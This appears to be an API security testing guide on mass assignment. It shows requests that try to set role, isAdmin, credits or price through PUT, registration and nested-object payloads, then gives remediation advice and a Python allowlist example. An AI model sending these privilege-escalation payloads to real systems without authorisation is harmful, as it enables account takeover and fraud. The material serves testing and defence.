API Security API3

Mass Assignment Testing

Mass assignment (also known as auto-binding) occurs when an API endpoint automatically binds client-supplied input to internal object properties without restricting which properties may be set. This allows attackers to modify properties they should not have access to, such as `isAdmin`, `balance`, or `role`.

Testing Techniques

The goal is to identify hidden fields and try to modify them.

1. Observe API Response

Look for fields in the response that the documented request does not accept, such as `role`, `isVerified`, or `credits`.

Request:

```http
GET /api/users/1001
```

Response:

```json
{
  "id": 1001,
  "name": "John",
  "email": "john@example.com",
  "role": "user",
  "isVerified": true,
  "credits": 100,
  "internalId": "abc123"
}
```

2. Attempt Modification

Try to include these fields in a PUT or POST request with elevated values.

```http
PUT /api/users/1001
Content-Type: application/json

{
  "name": "John",
  "role": "admin",
  "isVerified": true,
  "credits": 99999
}
```

3. Common Parameters

Even if you don't see them in the response, try guessing common administrative parameter names.

```json
{
  "role": "admin",
  "isAdmin": true,
  "admin": true,
  "is_admin": true,
  "user_type": "admin",
  "userType": "admin",
  "privilege": "admin",
  "permissions": ["admin"],
  "access": "full",
  "verified": true,
  "email_verified": true,
  "active": true,
  "approved": true,
  "credits": 99999,
  "balance": 99999,
  "discount": 100,
  "price": 0
}
```

4. Registration Testing

Registration endpoints are often vulnerable to mass assignment.

```http
POST /api/register
Content-Type: application/json

{
  "username": "attacker",
  "password": "password123",
  "email": "attacker@evil.com",
  "role": "admin"
}
```

5. Nested Objects

Don't forget to test nested objects.

```json
{
  "user": {
    "role": "admin"
  },
  "profile": {
    "isAdmin": true
  }
}
```

Remediation

Defense Strategies

  • Avoid using functions that automatically bind client input to code variables or internal objects.
  • Explicitly define a whitelist of allowed properties that can be updated by the client (e.g., DTOs).
  • Set sensitive properties like `isAdmin` or `role` only on the server side.
  • Use `readOnly` properties in your API schema definitions.
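The first two defense strategies side by side, as an added example that is not part of the original page: an update handler that auto-binds the whole request body (the bug behind steps 2 to 5) next to one that binds only an explicit allowlist and rejects nested objects. The user record, the `CLIENT_WRITABLE` allowlist and the function names are assumptions; no web framework is used, the handlers simply take the parsed JSON body as a dict.

```python
from __future__ import annotations
import copy

# Constructed sample record, mirroring the fields shown in the GET response above.
USER_1001 = {
    "id": 1001, "name": "John", "email": "john@example.com",
    "role": "user", "isVerified": True, "credits": 100, "internalId": "abc123",
}


def update_user_vulnerable(user: dict, body: dict) -> dict:
    """Mass-assignment bug: every key the client sends is bound onto the object,
    so "role", "credits" and "isVerified" are overwritten along with "name"."""
    updated = copy.deepcopy(user)
    updated.update(body)
    return updated


# Allowlist (the "DTO" of the remediation list): the only properties a client
# may change on its own profile. Everything else is set server side only.
CLIENT_WRITABLE = {"name", "email"}


def update_user_safe(user: dict, body: dict) -> tuple[dict, list[str]]:
    """Bind allowlisted scalar fields only and report every rejected key.

    Nested objects/arrays are rejected even for allowlisted keys, so a payload
    like {"user": {"role": "admin"}} (step 5) cannot smuggle a protected field.
    The rejected list is worth logging: unexpected keys such as "role" or
    "credits" on a profile update are a cheap detection signal for probing.
    """
    updated = copy.deepcopy(user)
    rejected: list[str] = []
    for key, value in body.items():
        if key not in CLIENT_WRITABLE or isinstance(value, (dict, list)):
            rejected.append(key)
            continue
        updated[key] = value
    return updated, rejected


if __name__ == "__main__":
    # Constructed attacker-style body combining steps 2, 3 and 5 from above.
    body = {"name": "Johnny", "role": "admin", "credits": 99999,
            "user": {"role": "admin"}}
    print("vulnerable:", update_user_vulnerable(USER_1001, body))
    print("safe:      ", update_user_safe(USER_1001, body))
```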